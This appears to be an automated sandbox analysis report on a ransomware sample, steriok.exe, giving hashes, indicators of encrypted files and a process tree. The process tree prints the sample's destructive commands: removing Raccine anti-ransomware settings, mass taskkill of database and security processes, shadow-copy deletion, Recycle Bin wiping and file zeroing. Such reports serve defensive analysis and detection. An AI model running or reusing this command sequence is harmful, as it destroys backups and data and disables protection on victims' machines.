eb2ed1680e9b2350d78f431849a9e8c5c1d91d97ae72767d228b2208e6f72f46

Resubmissions

29-10-2021 09:03

211029-kz7xysdac7 10

28-10-2021 13:28

211028-qq5dcsgdeq 10

23-10-2021 01:52

211023-cagepshab4 8

Analysis

max time kernel
117s
max time network
135s
platform
windows10_x64
resource
win10-en-20210920
submitted
29-10-2021 09:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

steriok.exe
Size

94KB
MD5

b0c615c0a4f485b2030d6e1ab98375f0
SHA1

de11e9d61e0a31dc19e8c5dd8fe06facf0ead052
SHA256

eb2ed1680e9b2350d78f431849a9e8c5c1d91d97ae72767d228b2208e6f72f46
SHA512

82342be7d388244b5b008134d6d351f669995caff94a9a532ce056130f1af54a20ec6f2b9a3ca78102200c53a73659d1043e5b213ce84642d225690a3a848024

Score

8^/10

ransomware

Malware Config

Signatures

Modifies extensions of user files 12 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\EditUnregister.png => C:\Users\Admin\Pictures\EditUnregister.png.steriok	steriok.exe
File renamed	C:\Users\Admin\Pictures\OutUnpublish.tiff => C:\Users\Admin\Pictures\OutUnpublish.tiff.steriok	steriok.exe
File opened for modification	C:\Users\Admin\Pictures\OutUnpublish.tiff.steriok	steriok.exe
File renamed	C:\Users\Admin\Pictures\PublishDisconnect.tiff => C:\Users\Admin\Pictures\PublishDisconnect.tiff.steriok	steriok.exe
File opened for modification	C:\Users\Admin\Pictures\PublishDisconnect.tiff.steriok	steriok.exe
File renamed	C:\Users\Admin\Pictures\UninstallResize.png => C:\Users\Admin\Pictures\UninstallResize.png.steriok	steriok.exe
File opened for modification	C:\Users\Admin\Pictures\UninstallResize.png.steriok	steriok.exe
File opened for modification	C:\Users\Admin\Pictures\EditUnregister.png.steriok	steriok.exe
File opened for modification	C:\Users\Admin\Pictures\OutUnpublish.tiff	steriok.exe
File opened for modification	C:\Users\Admin\Pictures\PublishDisconnect.tiff	steriok.exe
File renamed	C:\Users\Admin\Pictures\ResumeMeasure.png => C:\Users\Admin\Pictures\ResumeMeasure.png.steriok	steriok.exe
File opened for modification	C:\Users\Admin\Pictures\ResumeMeasure.png.steriok	steriok.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	steriok.exe

Drops desktop.ini file(s) 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	steriok.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	steriok.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini	steriok.exe

Drops file in Program Files directory 59 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\ConvertSave.wmx.steriok	steriok.exe
File opened for modification	C:\Program Files\OpenSubmit.aiff.steriok	steriok.exe
File opened for modification	C:\Program Files\ConvertSave.wmx	steriok.exe
File opened for modification	C:\Program Files\FindEnter.mp4.steriok	steriok.exe
File opened for modification	C:\Program Files\FindPing.M2TS.steriok	steriok.exe
File opened for modification	C:\Program Files\OpenSubmit.aiff	steriok.exe
File opened for modification	C:\Program Files\RevokeDismount.ppsm	steriok.exe
File opened for modification	C:\Program Files\DebugPop.mid.steriok	steriok.exe
File opened for modification	C:\Program Files\HideRevoke.css	steriok.exe
File opened for modification	C:\Program Files\ImportRequest.ttc	steriok.exe
File opened for modification	C:\Program Files\ReceiveRename.MOD.steriok	steriok.exe
File opened for modification	C:\Program Files\CopyConvertTo.svg.steriok	steriok.exe
File opened for modification	C:\Program Files\FindEnter.mp4	steriok.exe
File opened for modification	C:\Program Files\InvokeResume.ico	steriok.exe
File opened for modification	C:\Program Files\InvokeNew.vsdm	steriok.exe
File opened for modification	C:\Program Files\WatchBackup.xhtml.steriok	steriok.exe
File opened for modification	C:\Program Files\RestoreRead.dib.steriok	steriok.exe
File opened for modification	C:\Program Files\ComparePublish.scf.steriok	steriok.exe
File opened for modification	C:\Program Files\FindPing.M2TS	steriok.exe
File opened for modification	C:\Program Files\InvokeResume.ico.steriok	steriok.exe
File opened for modification	C:\Program Files\RequestRemove.m1v	steriok.exe
File opened for modification	C:\Program Files\RestoreRead.dib	steriok.exe
File opened for modification	C:\Program Files\RevokeDismount.ppsm.steriok	steriok.exe
File opened for modification	C:\Program Files\HideSuspend.ram.steriok	steriok.exe
File opened for modification	C:\Program Files\LimitOut.ex_	steriok.exe
File opened for modification	C:\Program Files\LimitOut.ex_.steriok	steriok.exe
File opened for modification	C:\Program Files\ReceiveRename.MOD	steriok.exe
File opened for modification	C:\Program Files\ConfirmNew.7z.steriok	steriok.exe
File opened for modification	C:\Program Files\ExportBlock.xht.steriok	steriok.exe
File opened for modification	C:\Program Files\HideSuspend.ram	steriok.exe
File opened for modification	C:\Program Files\StartUnblock.shtml	steriok.exe
File opened for modification	C:\Program Files\UninstallHide.xht.steriok	steriok.exe
File opened for modification	C:\Program Files\HideRevoke.css.steriok	steriok.exe
File opened for modification	C:\Program Files\InvokeNew.vsdm.steriok	steriok.exe
File opened for modification	C:\Program Files\RegisterMount.csv	steriok.exe
File opened for modification	C:\Program Files\StopLock.wax	steriok.exe
File opened for modification	C:\Program Files\UninstallHide.xht	steriok.exe
File opened for modification	C:\Program Files\WatchBackup.xhtml	steriok.exe
File opened for modification	C:\Program Files\ComparePublish.scf	steriok.exe
File opened for modification	C:\Program Files\RequestExit.png	steriok.exe
File opened for modification	C:\Program Files\RequestRemove.m1v.steriok	steriok.exe
File opened for modification	C:\Program Files\UnregisterUndo.xla.steriok	steriok.exe
File opened for modification	C:\Program Files\WaitDisable.m1v	steriok.exe
File opened for modification	C:\Program Files\CopyConvertTo.svg	steriok.exe
File opened for modification	C:\Program Files\StopLock.wax.steriok	steriok.exe
File opened for modification	C:\Program Files\UnregisterUndo.xla	steriok.exe
File opened for modification	C:\Program Files\RequestExit.png.steriok	steriok.exe
File created	C:\Program Files\RESTORE_FILES_INFO.txt	steriok.exe
File opened for modification	C:\Program Files\DebugPop.mid	steriok.exe
File opened for modification	C:\Program Files\ExportBlock.xht	steriok.exe
File opened for modification	C:\Program Files\ImportRequest.ttc.steriok	steriok.exe
File opened for modification	C:\Program Files\RegisterMount.csv.steriok	steriok.exe
File opened for modification	C:\Program Files\StartUnblock.shtml.steriok	steriok.exe
File opened for modification	C:\Program Files\WaitDisable.m1v.steriok	steriok.exe
File opened for modification	C:\Program Files\ConfirmNew.7z	steriok.exe
File opened for modification	C:\Program Files\RedoReceive.xhtml	steriok.exe
File opened for modification	C:\Program Files\SwitchReset.bin.steriok	steriok.exe
File opened for modification	C:\Program Files\RedoReceive.xhtml.steriok	steriok.exe
File opened for modification	C:\Program Files\SwitchReset.bin	steriok.exe

Drops file in Windows directory 23 IoCs

description	ioc	Process
File opened for modification	C:\Windows\setupact.log.steriok	steriok.exe
File opened for modification	C:\Windows\system.ini	steriok.exe
File opened for modification	C:\Windows\win.ini.steriok	steriok.exe
File created	C:\Windows\RESTORE_FILES_INFO.txt	steriok.exe
File created	C:\Windows\bootstat.dat.steriok	steriok.exe
File opened for modification	C:\Windows\DtcInstall.log	steriok.exe
File opened for modification	C:\Windows\lsasetup.log	steriok.exe
File opened for modification	C:\Windows\WMSysPr9.prx	steriok.exe
File opened for modification	C:\Windows\Professional.xml.steriok	steriok.exe
File opened for modification	C:\Windows\setupact.log	steriok.exe
File opened for modification	C:\Windows\system.ini.steriok	steriok.exe
File opened for modification	C:\Windows\WindowsShell.Manifest	steriok.exe
File opened for modification	C:\Windows\DtcInstall.log.steriok	steriok.exe
File opened for modification	C:\Windows\lsasetup.log.steriok	steriok.exe
File opened for modification	C:\Windows\mib.bin	steriok.exe
File opened for modification	C:\Windows\PFRO.log	steriok.exe
File opened for modification	C:\Windows\WindowsUpdate.log.steriok	steriok.exe
File opened for modification	C:\Windows\win.ini	steriok.exe
File opened for modification	C:\Windows\WindowsUpdate.log	steriok.exe
File opened for modification	C:\Windows\bootstat.dat	steriok.exe
File opened for modification	C:\Windows\PFRO.log.steriok	steriok.exe
File opened for modification	C:\Windows\Professional.xml	steriok.exe
File opened for modification	C:\Windows\setuperr.log	steriok.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 48 IoCs

evasion

pid	Process
4860	taskkill.exe
2668	taskkill.exe
2776	taskkill.exe
4592	taskkill.exe
1396	taskkill.exe
956	taskkill.exe
2364	taskkill.exe
5052	taskkill.exe
1192	taskkill.exe
3632	taskkill.exe
2212	taskkill.exe
5112	taskkill.exe
964	taskkill.exe
5004	taskkill.exe
4996	taskkill.exe
4772	taskkill.exe
2440	taskkill.exe
3644	taskkill.exe
3012	taskkill.exe
660	taskkill.exe
1508	taskkill.exe
1220	taskkill.exe
3156	taskkill.exe
4704	taskkill.exe
4104	taskkill.exe
1564	taskkill.exe
3200	taskkill.exe
4692	taskkill.exe
3888	taskkill.exe
2324	taskkill.exe
4584	taskkill.exe
4272	taskkill.exe
4196	taskkill.exe
2804	taskkill.exe
2864	taskkill.exe
1328	taskkill.exe
3776	taskkill.exe
1364	taskkill.exe
1488	taskkill.exe
4980	taskkill.exe
1300	taskkill.exe
1284	taskkill.exe
4664	taskkill.exe
616	taskkill.exe
4592	taskkill.exe
2856	taskkill.exe
4160	taskkill.exe
4920	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3476	reg.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
3460	notepad.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2944	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe
4268	steriok.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	4268	steriok.exe
Token: SeDebugPrivilege	4592	taskkill.exe
Token: SeDebugPrivilege	2864	taskkill.exe
Token: SeDebugPrivilege	3156	taskkill.exe
Token: SeDebugPrivilege	3888	taskkill.exe
Token: SeDebugPrivilege	4920	taskkill.exe
Token: SeDebugPrivilege	1284	taskkill.exe
Token: SeDebugPrivilege	1300	taskkill.exe
Token: SeDebugPrivilege	4996	taskkill.exe
Token: SeDebugPrivilege	4692	taskkill.exe
Token: SeDebugPrivilege	4664	taskkill.exe
Token: SeDebugPrivilege	4860	taskkill.exe
Token: SeDebugPrivilege	4772	taskkill.exe
Token: SeDebugPrivilege	616	taskkill.exe
Token: SeDebugPrivilege	1192	taskkill.exe
Token: SeDebugPrivilege	4704	taskkill.exe
Token: SeDebugPrivilege	1396	taskkill.exe
Token: SeDebugPrivilege	2440	taskkill.exe
Token: SeDebugPrivilege	1328	taskkill.exe
Token: SeDebugPrivilege	2324	taskkill.exe
Token: SeDebugPrivilege	4104	taskkill.exe
Token: SeDebugPrivilege	956	taskkill.exe
Token: SeDebugPrivilege	2364	taskkill.exe
Token: SeDebugPrivilege	3632	taskkill.exe
Token: SeDebugPrivilege	2212	taskkill.exe
Token: SeDebugPrivilege	5112	taskkill.exe
Token: SeDebugPrivilege	3644	taskkill.exe
Token: SeDebugPrivilege	2668	taskkill.exe
Token: SeDebugPrivilege	3012	taskkill.exe
Token: SeDebugPrivilege	4272	taskkill.exe
Token: SeDebugPrivilege	4584	taskkill.exe
Token: SeDebugPrivilege	4196	taskkill.exe
Token: SeDebugPrivilege	964	taskkill.exe
Token: SeDebugPrivilege	1364	taskkill.exe
Token: SeDebugPrivilege	660	taskkill.exe
Token: SeDebugPrivilege	1564	taskkill.exe
Token: SeDebugPrivilege	1488	taskkill.exe
Token: SeDebugPrivilege	2804	taskkill.exe
Token: SeDebugPrivilege	2776	taskkill.exe
Token: SeDebugPrivilege	4592	taskkill.exe
Token: SeDebugPrivilege	2856	taskkill.exe
Token: SeDebugPrivilege	4160	taskkill.exe
Token: SeDebugPrivilege	3200	taskkill.exe
Token: SeDebugPrivilege	5004	taskkill.exe
Token: SeDebugPrivilege	4980	taskkill.exe
Token: SeDebugPrivilege	1508	taskkill.exe
Token: SeDebugPrivilege	5052	taskkill.exe
Token: SeDebugPrivilege	1220	taskkill.exe
Token: SeDebugPrivilege	4296	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4268	steriok.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
4268	steriok.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4268 wrote to memory of 4592	4268	steriok.exe	70
PID 4268 wrote to memory of 4592	4268	steriok.exe	70
PID 4268 wrote to memory of 4592	4268	steriok.exe	70
PID 4268 wrote to memory of 4492	4268	steriok.exe	72
PID 4268 wrote to memory of 4492	4268	steriok.exe	72
PID 4268 wrote to memory of 4492	4268	steriok.exe	72
PID 4268 wrote to memory of 3476	4268	steriok.exe	74
PID 4268 wrote to memory of 3476	4268	steriok.exe	74
PID 4268 wrote to memory of 3476	4268	steriok.exe	74
PID 4268 wrote to memory of 4328	4268	steriok.exe	76
PID 4268 wrote to memory of 4328	4268	steriok.exe	76
PID 4268 wrote to memory of 4328	4268	steriok.exe	76
PID 4268 wrote to memory of 436	4268	steriok.exe	78
PID 4268 wrote to memory of 436	4268	steriok.exe	78
PID 4268 wrote to memory of 436	4268	steriok.exe	78
PID 4268 wrote to memory of 828	4268	steriok.exe	80
PID 4268 wrote to memory of 828	4268	steriok.exe	80
PID 4268 wrote to memory of 828	4268	steriok.exe	80
PID 4268 wrote to memory of 912	4268	steriok.exe	85
PID 4268 wrote to memory of 912	4268	steriok.exe	85
PID 4268 wrote to memory of 912	4268	steriok.exe	85
PID 4268 wrote to memory of 636	4268	steriok.exe	81
PID 4268 wrote to memory of 636	4268	steriok.exe	81
PID 4268 wrote to memory of 636	4268	steriok.exe	81
PID 4268 wrote to memory of 1448	4268	steriok.exe	86
PID 4268 wrote to memory of 1448	4268	steriok.exe	86
PID 4268 wrote to memory of 1448	4268	steriok.exe	86
PID 4268 wrote to memory of 1576	4268	steriok.exe	88
PID 4268 wrote to memory of 1576	4268	steriok.exe	88
PID 4268 wrote to memory of 1576	4268	steriok.exe	88
PID 4268 wrote to memory of 1700	4268	steriok.exe	90
PID 4268 wrote to memory of 1700	4268	steriok.exe	90
PID 4268 wrote to memory of 1700	4268	steriok.exe	90
PID 4268 wrote to memory of 2136	4268	steriok.exe	92
PID 4268 wrote to memory of 2136	4268	steriok.exe	92
PID 4268 wrote to memory of 2136	4268	steriok.exe	92
PID 4268 wrote to memory of 2540	4268	steriok.exe	94
PID 4268 wrote to memory of 2540	4268	steriok.exe	94
PID 4268 wrote to memory of 2540	4268	steriok.exe	94
PID 4268 wrote to memory of 2864	4268	steriok.exe	96
PID 4268 wrote to memory of 2864	4268	steriok.exe	96
PID 4268 wrote to memory of 2864	4268	steriok.exe	96
PID 4268 wrote to memory of 3156	4268	steriok.exe	98
PID 4268 wrote to memory of 3156	4268	steriok.exe	98
PID 4268 wrote to memory of 3156	4268	steriok.exe	98
PID 4268 wrote to memory of 3888	4268	steriok.exe	99
PID 4268 wrote to memory of 3888	4268	steriok.exe	99
PID 4268 wrote to memory of 3888	4268	steriok.exe	99
PID 4268 wrote to memory of 4920	4268	steriok.exe	102
PID 4268 wrote to memory of 4920	4268	steriok.exe	102
PID 4268 wrote to memory of 4920	4268	steriok.exe	102
PID 4268 wrote to memory of 1284	4268	steriok.exe	104
PID 4268 wrote to memory of 1284	4268	steriok.exe	104
PID 4268 wrote to memory of 1284	4268	steriok.exe	104
PID 4268 wrote to memory of 1300	4268	steriok.exe	106
PID 4268 wrote to memory of 1300	4268	steriok.exe	106
PID 4268 wrote to memory of 1300	4268	steriok.exe	106
PID 4268 wrote to memory of 4996	4268	steriok.exe	108
PID 4268 wrote to memory of 4996	4268	steriok.exe	108
PID 4268 wrote to memory of 4996	4268	steriok.exe	108
PID 4268 wrote to memory of 4692	4268	steriok.exe	110
PID 4268 wrote to memory of 4692	4268	steriok.exe	110
PID 4268 wrote to memory of 4692	4268	steriok.exe	110
PID 4268 wrote to memory of 4664	4268	steriok.exe	113

C:\Users\Admin\AppData\Local\Temp\steriok.exe
"C:\Users\Admin\AppData\Local\Temp\steriok.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4268
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4592
- C:\Windows\SysWOW64\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:4492
- C:\Windows\SysWOW64\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:3476
- C:\Windows\SysWOW64\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:4328
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:436
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:828
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:636
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:912
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1448
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1576
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:1700
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:2136
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:2540
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2864
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3156
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3888
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4920
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1284
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1300
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4996
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4692
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4664
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4860
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4772
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:616
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1192
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4704
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1396
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2440
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1328
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2324
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4104
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:956
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2364
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3632
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2212
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5112
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3644
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:3776
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2668
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4584
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3012
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4272
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4196
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:964
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:660
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1364
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1564
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1488
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2804
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2776
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4592
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2856
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4160
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3200
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5004
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4980
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1508
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5052
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1220
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4296
- C:\Windows\SysWOW64\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3460
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:2148
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:2944
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:3444
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\steriok.exe
  2⤵
  PID:3160
- - C:\Windows\SysWOW64\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:3996

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

